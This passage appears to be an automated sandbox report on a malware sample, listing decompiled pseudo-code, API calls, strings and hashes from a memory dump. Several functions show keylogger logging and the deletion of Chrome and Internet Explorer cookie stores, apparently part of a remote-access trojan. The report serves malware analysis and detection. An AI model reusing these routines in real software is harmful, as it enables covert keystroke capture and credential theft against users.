                              																	_t332 =  &_v276;
                              																	_push(_t332);
                              																	_push(_v460);
                              																	_push(_t428);
                              																	L83();
                              																	_t472 = _t475 + 0xc;
                              																	__eflags = _t332;
                              																	_t268 = _v452;
                              																	if(_t332 != 0) {
                              																		_t268 = _t268 + 1;
                              																		_v452 = _t268;
                              																	}
                              																	L54:
                              																	_t444 = _t359 + _t447 * 2;
                              																	_t370 = 0;
                              																	__eflags =  *_t444;
                              																	if( *_t444 == 0) {
                              																		L56:
                              																		__eflags = _t268;
                              																		L77:
                              																		if(__eflags != 0) {
                              																			goto L79;
                              																		} else {
                              																		}
                              																		goto L80;
                              																	} else {
                              																		_t444 = _t444 + 2;
                              																		__eflags =  *_t444;
                              																		if( *_t444 != 0) {
                              																			continue;
                              																		} else {
                              																			goto L56;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t333 = 0x3b;
                              														__eflags =  *_t359 - _t333;
                              														if( *_t359 != _t333) {
                              															break;
                              														} else {
                              															goto L48;
                              														}
                              													}
                              												}
                              											}
                              											goto L130;
                              										}
                              										goto L80;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						__eflags = _t444;
                              						if(_t444 != 0) {
                              							_push(_t444);
                              							_push(_t249);
                              							_push(_t428);
                              							L83();
                              						}
                              						L80:
                              						__eflags = _v12 ^ _t463;
                              						return E0042F61B(_v12 ^ _t463);
                              					}
                              				}
                              				L130:
                              			}
                              0x0043da1a
                              0x0043da20
                              0x0043da21
                              0x0043da22
                              0x0043da23
                              0x0043da24
                              0x0043da25
                              0x0043da2a
                              0x0043da30
                              0x0043d7c7
                              0x0043d7c7
                              0x0043d7d5
                              0x0043d7d8
                              0x0043d7f3
                              0x0043d7fa
                              0x0043d800
                              0x0043d806
                              0x0043d7da
                              0x0043d7da
                              0x0043d7e2
                              0x00000000
                              0x0043d7e4
                              0x0043d7e4
                              0x0043d7ea
                              0x0043d7ea
                              0x0043d7e2
                              0x0043d80d
                              0x0043d810
                              0x0043d92d
                              0x0043d930
                              0x0043d93d
                              0x0043d940
                              0x0043d948
                              0x0043d948
                              0x0043d932
                              0x0043d938
                              0x0043d938
                              0x0043d816
                              0x0043d816
                              0x0043d81c
                              0x0043d824
                              0x0043d826
                              0x0043d829
                              0x0043d832
                              0x0043d83b
                              0x0043d841
                              0x0043d841
                              0x0043d844
                              0x0043d846
                              0x00000000
                              0x00000000
                              0x0043d848
                              0x0043d84e
                              0x0043d84f
                              0x0043d85a
                              0x0043d862
                              0x0043d86a
                              0x0043d86d
                              0x0043d870
                              0x0043d876
                              0x0043d87c
                              0x0043d882
                              0x0043d888
                              0x0043d88b
                              0x00000000
                              0x00000000
                              0x0043d88d
                              0x0043d8b2
                              0x0043d8b2
                              0x0043d8b5
                              0x0043d8b9
                              0x0043d8d2
                              0x0043d8d7
                              0x0043d8da
                              0x0043d8dc
                              0x0043d8e2
                              0x0043d91d
                              0x0043d8e4
                              0x0043d8e4
                              0x0043d8e9
                              0x0043d8f1
                              0x0043d8f2
                              0x0043d8f2
                              0x0043d909
                              0x0043d910
                              0x0043d913
                              0x0043d918
                              0x0043d918
                              0x0043d920
                              0x0043d923
                              0x0043d923
                              0x0043d928
                              0x00000000
                              0x0043d928
                              0x0043d88f
                              0x0043d891
                              0x0043d896
                              0x0043d89c
                              0x0043d8a5
                              0x0043d8ae
                              0x0043d8ae
                              0x00000000
                              0x0043d891
                              0x0043d94b
                              0x0043d94b
                              0x0043d94f
                              0x0043d957
                              0x0043d95d
                              0x0043d960
                              0x0043d966
                              0x0043d968
                              0x0043d9a8
                              0x0043d9ae
                              0x0043d9b5
                              0x0043d9b5
                              0x0043d9bb
                              0x0043d9bf
                              0x00000000
                              0x0043d9c1
                              0x0043d9c1
                              0x0043d9c5
                              0x0043d9ca
                              0x0043d9ce
                              0x0043d9d3
                              0x0043d9da
                              0x0043d9e8
                              0x0043d9ee
                              0x0043d9f1
                              0x0043d9f1
                              0x0043d9bf
                              0x0043da00
                              0x0043da08
                              0x0043da11
                              0x0043d96a
                              0x0043d970
                              0x0043d973
                              0x0043d97a
                              0x0043d98c
                              0x0043d993
                              0x0043d9a0
                              0x00000000
                              0x0043d9a0
                              0x00000000
                              0x0043d968
                              0x0043d7c1
                              0x0043d73c
                              0x00000000
                              0x0043d73c
                              0x00000000
                              0x0043d73a
                              0x0043d733
                              0x0043d735
                              0x0043d735
                              0x00000000
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6c1
                              0x0043d6c6
                              0x0043d6d1
                              0x0043d6d1
                              0x0043d4e8
                              0x0043d4e8
                              0x0043d4eb
                              0x0043d4f0
                              0x0043d64d
                              0x00000000
                              0x0043d4f6
                              0x0043d4f8
                              0x0043d500
                              0x0043d506
                              0x0043d507
                              0x0043d50d
                              0x0043d50e
                              0x0043d513
                              0x0043d516
                              0x0043d518
                              0x0043d51e
                              0x0043d520
                              0x0043d521
                              0x0043d521
                              0x0043d52f
                              0x0043d52f
                              0x0043d532
                              0x0043d534
                              0x0043d537
                              0x0043d545
                              0x0043d545
                              0x0043d62f
                              0x0043d62f
                              0x00000000
                              0x0043d631
                              0x0043d631
                              0x00000000
                              0x0043d539
                              0x0043d539
                              0x0043d53c
                              0x0043d53f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d53f
                              0x0043d537
                              0x0043d4f0
                              0x0043d4e2
                              0x0043d4b5
                              0x0043d4b7
                              0x0043d4b8
                              0x0043d4bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d4bb
                              0x0043d4b3
                              0x0043d43b
                              0x00000000
                              0x0043d42f
                              0x00000000
                              0x0043d54c
                              0x0043d402
                              0x0043d3f7
                              0x0043d3ec
                              0x0043d3a5
                              0x0043d3a5
                              0x0043d3a7
                              0x0043d3a9
                              0x0043d3aa
                              0x0043d3ab
                              0x0043d3ac
                              0x0043d3b1
                              0x0043d63c
                              0x0043d641
                              0x0043d64c
                              0x0043d64c
                              0x0043d3a3
                              0x00000000

                              APIs
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • _free.LIBCMT ref: 0043D2EC
                              • _free.LIBCMT ref: 0043D303
                              • _free.LIBCMT ref: 0043D322
                              • _free.LIBCMT ref: 0043D33D
                              • _free.LIBCMT ref: 0043D354
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$AllocHeap
                              • String ID: sE
                              • API String ID: 1835388192-3868527542
                              • Opcode ID: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
                              • Opcode Fuzzy Hash: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0040A7A6(void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v340;
                              				void* __ebx;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t17;
                              				void* _t20;
                              				int _t34;
                              				void* _t40;
                              				void* _t41;
                              				char* _t42;
                              				void* _t48;
                              				char* _t55;
                              				void* _t59;
                              				void* _t61;
                              				void* _t62;
                              
                              				_t42 =  &_v28;
                              				E004020B5(_t40, _t42);
                              				_push(_t42);
                              				_t41 = 0;
				// 0x80000001 is HKEY_CURRENT_USER: the call reads the user's "Cookies" shell-folder path from the registry
				_t17 = E004102D2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                              				_t62 = _t61 + 0xc;
                              				L00401FB1( &_v28, 0x80000001, _t59, _t17);
                              				L00401FA7();
                              				_t58 = 0x45f6ac;
                              				_t20 = L00405A22(0x45f6ac);
                              				_t66 = _t20;
                              				if(_t20 == 0) {
					// expand %VAR% references in the folder path into a MAX_PATH (0x104) byte buffer
					ExpandEnvironmentStringsA(L00401F75( &_v28),  &_v340, 0x104);
					// branch on whether the cookies folder exists; the two string IDs ("[IE cookies cleared!]" / "[IE cookies not found]") are the status messages for either outcome
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
                              						goto L1;
                              					} else {
                              						E00402064(0,  &_v52,  &_v340);
                              						_t58 =  &_v52;
                              						_t34 = E004170AC(L00401ECB(L00416C32( &_v76,  &_v52)));
                              						L00401ED0();
                              						_t55 =  &_v52;
                              						L00401FA7();
                              						__eflags = _t34;
                              						if(__eflags == 0) {
                              							_push(_t55);
                              							_push(_t55);
                              							__eflags = L0040AAB0();
                              							if(__eflags != 0) {
                              								_t41 = 1;
                              								E00402064(1, _t62 - 0x18, "\n[IE cookies cleared!]");
                              								L0040AA8C(1,  &_v52, __eflags);
                              								goto L8;
                              							}
                              						} else {
                              							_t48 = _t62 - 0x18;
                              							_push("\n[IE cookies cleared!]");
                              							goto L2;
                              						}
                              					}
                              				} else {
                              					L1:
                              					_t48 = _t62 - 0x18;
                              					_push("\n[IE cookies not found]");
                              					L2:
                              					E00402064(_t41, _t48);
                              					L0040AA8C(_t41, _t58, _t66);
                              					_t41 = 1;
                              					L8:
                              				}
                              				L00401FA7();
                              				return _t41;
                              			}

                              0x0040a7af
                              0x0040a7b4
                              0x0040a7b9
                              0x0040a7cc
                              0x0040a7ce
                              0x0040a7d3
                              0x0040a7da
                              0x0040a7e2
                              0x0040a7e7
                              0x0040a7ef
                              0x0040a7f4
                              0x0040a7f6
                              0x0040a828
                              0x0040a83b
                              0x0040a83d
                              0x00000000
                              0x0040a83f
                              0x0040a849
                              0x0040a84e
                              0x0040a862
                              0x0040a86c
                              0x0040a871
                              0x0040a874
                              0x0040a879
                              0x0040a87b
                              0x0040a88c
                              0x0040a88d
                              0x0040a893
                              0x0040a895
                              0x0040a89a
                              0x0040a8a3
                              0x0040a8a8
                              0x00000000
                              0x0040a8a8
                              0x0040a87d
                              0x0040a880
                              0x0040a882
                              0x00000000
                              0x0040a882
                              0x0040a87b
                              0x0040a7f8
                              0x0040a7f8
                              0x0040a7fb
                              0x0040a7fd
                              0x0040a802
                              0x0040a802
                              0x0040a807
                              0x0040a80c
                              0x0040a8ad
                              0x0040a8ad
                              0x0040a8b3
                              0x0040a8bf

                              APIs
                                • Part of subcall function 004102D2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 004102F4
                                • Part of subcall function 004102D2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00410313
                                • Part of subcall function 004102D2: RegCloseKey.ADVAPI32(?), ref: 0041031C
                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A828
                              • PathFileExistsA.SHLWAPI(?), ref: 0040A835
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              • API String ID: 1133728706-4073444585
                              • Opcode ID: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
                              • Instruction ID: 86840d2655219e895a2e3310a5aa52ddb93a2453b48acae1739db4ed104c70da
                              • Opcode Fuzzy Hash: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
                              • Instruction Fuzzy Hash: 8621BF31A102055ACB18B7B1CC5BDEE77689F15304F80013FB901B71D2EA7C9A5ACA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E0044FA43(char* _a4, short* _a8) {
                              				int _v8;
                              				void* __ecx;
                              				void* __esi;
                              				short* _t10;
                              				short* _t14;
                              				int _t15;
                              				short* _t16;
                              				void* _t26;
                              				int _t27;
                              				void* _t29;
                              				short* _t35;
                              				short* _t39;
                              				short* _t40;
                              
                              				_push(_t29);
                              				if(_a4 != 0) {
                              					_t39 = _a8;
                              					__eflags = _t39;
                              					if(__eflags != 0) {
                              						_push(_t26);
                              						L00440D5D(_t29, _t39, __eflags);
                              						asm("sbb ebx, ebx");
                              						_t35 = 0;
                              						_t27 = _t26 + 1;
                              						 *_t39 = 0;
						// first pass: query the number of wide characters needed for the NUL-terminated ANSI string
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							// allocate 2 bytes per wide character via the HeapAlloc wrapper E0043E61D, then convert for real
							_t40 = E0043E61D(_t29, _t10 + _t10);
                              							__eflags = _t40;
                              							if(_t40 != 0) {
                              								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                              								__eflags = _t15;
                              								if(_t15 != 0) {
									// success: hand the buffer to the caller and clear _t40 so the cleanup free below does not release it
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
                              								} else {
                              									L00439DDE(GetLastError());
                              								}
                              							}
                              							L0043EE85(_t40);
                              							_t14 = _t35;
                              						} else {
                              							L00439DDE(GetLastError());
                              							_t14 = 0;
                              						}
                              					} else {
                              						 *((intOrPtr*)(L00439E14())) = 0x16;
                              						E0043626D();
                              						_t14 = 0;
                              					}
                              					return _t14;
                              				}
				// NULL input: set errno to 0x16 (EINVAL) and invoke the invalid-parameter handler
				 *((intOrPtr*)(L00439E14())) = 0x16;
                              				E0043626D();
                              				return 0;
                              			}

                              0x0044fa48
                              0x0044fa4d
                              0x0044fa67
                              0x0044fa6a
                              0x0044fa6c
                              0x0044fa85
                              0x0044fa87
                              0x0044fa8e
                              0x0044fa90
                              0x0044fa99
                              0x0044fa9a
                              0x0044fa9e
                              0x0044faa4
                              0x0044faa7
                              0x0044faa9
                              0x0044fac3
                              0x0044fac6
                              0x0044fac8
                              0x0044fad5
                              0x0044fadb
                              0x0044fadd
                              0x0044faf1
                              0x0044faf3
                              0x0044faf7
                              0x0044faf7
                              0x0044faf8
                              0x0044fadf
                              0x0044fae6
                              0x0044faeb
                              0x0044fadd
                              0x0044fafb
                              0x0044fb00
                              0x0044faab
                              0x0044fab2
                              0x0044fab7
                              0x0044fab7
                              0x0044fa6e
                              0x0044fa73
                              0x0044fa79
                              0x0044fa7e
                              0x0044fa7e
                              0x00000000
                              0x0044fb05
                              0x0044fa54
                              0x0044fa5a
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
                              • Instruction ID: a1c109c1609699d4209c0352da68e76d0abf83c28ba15cddbfee87ef62dca71a
                              • Opcode Fuzzy Hash: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
                              • Instruction Fuzzy Hash: DE112472504215BFEB216FB28C0596B3A6CDF86761F11416AB829D7281DA78CD05C278
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E00409636(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                              				struct _SYSTEMTIME _v20;
                              				char _v44;
                              				char _v68;
                              				void* __edi;
                              				void* __esi;
                              				WCHAR* _t33;
                              				void* _t65;
                              				void* _t67;
                              				void* _t70;
                              
                              				_t70 = __eflags;
                              				_t42 = __ebx;
                              				_t67 = __ecx;
				// take the local wall-clock time; the fields are formatted below as the "[%04i/%02i/%02i %02i:%02i:%02i " log header
				GetLocalTime( &_v20);
                              				L00401EDA( &_a4, _t26, _t67, E00403086(__ebx,  &_v44, L00409E6B( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				_push(0x64 + E00402469() * 2);
                              				_t33 = L00438E06( &_a4);
                              				_t66 = _t33;
                              				_push(_v20.wSecond & 0x0000ffff);
                              				_push(_v20.wMinute & 0x0000ffff);
                              				_push(_v20.wHour & 0x0000ffff);
                              				_push(_v20.wDay & 0x0000ffff);
                              				_push(_v20.wMonth & 0x0000ffff);
                              				_push(_v20.wYear & 0x0000ffff);
                              				wsprintfW(_t33, L00401ECB( &_a4));
                              				if( *((char*)(_t67 + 0x49)) != 0) {
                              					_t19 = _t67 + 4; // 0x46c354
                              					E0040766E(__ebx, _t19, _t66, _t66);
                              				}
                              				if( *((char*)(_t67 + 0x4a)) != 0) {
                              					_t21 = _t67 + 0x1c; // 0x46c36c
                              					E0040766E(_t42, _t21, _t66, _t66);
                              					_t22 = _t67 + 0x3c; // 0x0
                              					SetEvent( *_t22);
                              				}
                              				L00438E01(_t66);
                              				return L00401ED0();
                              			}

                              0x00409636
                              0x00409636
                              0x00409641
                              0x00409644
                              0x00409670
                              0x00409678
                              0x00409680
                              0x00409694
                              0x00409695
                              0x0040969f
                              0x004096a5
                              0x004096aa
                              0x004096af
                              0x004096b4
                              0x004096b9
                              0x004096ba
                              0x004096c5
                              0x004096d2
                              0x004096d5
                              0x004096d8
                              0x004096d8
                              0x004096e1
                              0x004096e4
                              0x004096e7
                              0x004096ec
                              0x004096ef
                              0x004096ef
                              0x004096f6
                              0x00409709

                              APIs
                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • wsprintfW.USER32 ref: 004096C5
                              • SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: EventLocalTimechar_traitswsprintf
                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                              • API String ID: 3003339404-248792730
                              • Opcode ID: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
                              • Instruction ID: 6949cdf2dc2b1dc4c02aecbde94e80b0bd9bd0d89d133fd011f78c3c8f91f7cb
                              • Opcode Fuzzy Hash: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
                              • Instruction Fuzzy Hash: E921B376400118AAC728EB66DC558FF77B8AF08345F00013FF842621E2EF79AA45C7A9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 45%
                              			E00416871(void* __edx) {
                              				intOrPtr _v8;
                              				char _v12;
                              				char _v20;
                              				char _v28;
                              				char _v36;
                              				char _v44;
                              				char _v52;
                              				void* _t25;
                              				void* _t26;
                              				void* _t27;
                              				void* _t29;
                              				void* _t30;
                              				void* _t40;
                              				intOrPtr* _t44;
                              
                              				_t40 = __edx;
                              				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                              				 *_t44( &_v52,  &_v28,  &_v20);
                              				Sleep(0x3e8);
                              				 *_t44( &_v44,  &_v36,  &_v12);
                              				_t25 = E00416926( &_v12);
                              				_t26 = E00416926( &_v20);
                              				asm("sbb ebx, edx");
                              				_t27 = E00416926( &_v28);
                              				asm("sbb ebx, edx");
                              				_v8 = _t25 - _t26 - _t27 + E00416926( &_v36);
                              				asm("adc ebx, edx");
                              				_t29 = E00416926( &_v44);
                              				asm("sbb esi, edx");
                              				_t30 = E00416926( &_v52);
                              				asm("adc esi, edx");
                              				return E004500F0(E004500B0(_t25 - _t26 - _t27 + E00416926( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F), ref: 00416884
                              • GetProcAddress.KERNEL32(00000000), ref: 0041688B
                              • Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F,00000095), ref: 004168A6
                              • __aulldiv.LIBCMT ref: 0041691A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcSleep__aulldiv
                              • String ID: GetSystemTimes$kernel32.dll
                              • API String ID: 482274533-1354958348
                              • Opcode ID: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
                              • Instruction ID: 591b4d1d7c4e76c74ddada12000fb562f1f068179a7c55beccbbde0fa6e2f12d
                              • Opcode Fuzzy Hash: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
                              • Instruction Fuzzy Hash: BF11A5B7D003286BC710EBF5DD85DEF7B7CAB44750F05062AF905A3545ED349A0486E4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E004349C5(void* __ecx) {
                              				void* _t4;
                              				void* _t11;
                              				void* _t16;
                              				long _t25;
                              				void* _t28;
                              
                              				if( *0x46a090 != 0xffffffff) {
                              					_t25 = GetLastError();
                              					_t11 = E004314E8(__eflags,  *0x46a090);
                              					__eflags = _t11 - 0xffffffff;
                              					if(_t11 == 0xffffffff) {
                              						L5:
                              						_t11 = 0;
                              					} else {
                              						__eflags = _t11;
                              						if(__eflags == 0) {
                              							_t4 = E00431522(__eflags,  *0x46a090, 0xffffffff);
                              							_pop(_t16);
                              							__eflags = _t4;
                              							if(_t4 != 0) {
                              								_t28 = L0043DFD9(_t16, 1, 0x28);
                              								__eflags = _t28;
                              								if(__eflags == 0) {
                              									L8:
                              									_t11 = 0;
                              									E00431522(__eflags,  *0x46a090, 0);
                              								} else {
                              									__eflags = E00431522(__eflags,  *0x46a090, _t28);
                              									if(__eflags != 0) {
                              										_t11 = _t28;
                              										_t28 = 0;
                              										__eflags = 0;
                              									} else {
                              										goto L8;
                              									}
                              								}
                              								L0043EE85(_t28);
                              							} else {
                              								goto L5;
                              							}
                              						}
                              					}
                              					SetLastError(_t25);
                              					return _t11;
                              				} else {
                              					return 0;
                              				}
			}

                              APIs
                              • GetLastError.KERNEL32(?,?,004349BC,00431B02), ref: 004349D3
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004349E1
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004349FA
                              • SetLastError.KERNEL32(00000000,?,004349BC,00431B02), ref: 00434A4C
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
                              • Instruction ID: 0a03f5c56435e7b7bf565aa8bafc0807e20b5707f116f6618a4dc7084de369cb
                              • Opcode Fuzzy Hash: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
                              • Instruction Fuzzy Hash: 0401683320D7112E96117FB57C8569B2A44DB8D379F30223FF111512F1FE585C11564E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0040A320(void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				void* __ebx;
                              				void* __ebp;
                              				long _t18;
                              				void* _t20;
                              				void* _t21;
                              				void* _t28;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t35 = __eflags;
                              				_t31 = __edi;
                              				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
                              				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                              				L00401FA7();
                              				if(DeleteFileA(L00401F75( &_v28)) != 0) {
                              					_t28 = _t32 - 0x18;
                              					_push("\n[Chrome Cookies found, cleared!]");
                              					goto L6;
                              				} else {
                              					_t18 = GetLastError();
                              					if(_t18 == 0 || _t18 == 1) {
                              						_t28 = _t32 - 0x18;
                              						_push("\n[Chrome Cookies not found]");
                              						L6:
                              						E00402064(_t20, _t28);
                              						L0040AA8C(_t20, _t30, __eflags);
                              						_t21 = 1;
                              					} else {
                              						_t21 = 0;
                              					}
                              				}
                              				L00401FA7();
                              				return _t21;
			}

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
                              • GetLastError.KERNEL32 ref: 0040A366
                              Strings
                              • [Chrome Cookies found, cleared!], xrefs: 0040A38C
                              • UserProfile, xrefs: 0040A32C
                              • [Chrome Cookies not found], xrefs: 0040A380
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
                              • Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
                              • Opcode Fuzzy Hash: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
                              • Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E004050E5(void* __ecx, void* __edi, char _a4) {
                              				void* _t17;
                              				void* _t22;
                              				void* _t23;
                              
                              				_t22 = __ecx;
                              				if( *((char*)(__ecx + 0x50)) == 0) {
                              					return 0;
                              				}
                              				if(_a4 == 0) {
                              					_t24 = _t23 - 0x18;
                              					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
                              					E00402064(_t17, _t24 - 0x18, "[WARNING]");
                              					E004165D8(_t17, __edi);
                              				}
                              				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                              				SetEvent( *(_t22 + 0x54));
                              				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                              				CloseHandle( *(_t22 + 0x58));
                              				return 1;
			}

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405123
                              • SetEvent.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040512F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040513A
                              • CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405143
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: Connection KeepAlive disabled$[WARNING]
                              • API String ID: 2993684571-804309475
                              • Opcode ID: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
                              • Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
                              • Opcode Fuzzy Hash: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
                              • Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B82E
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043B841
                              • FreeLibrary.KERNEL32(00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B864
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
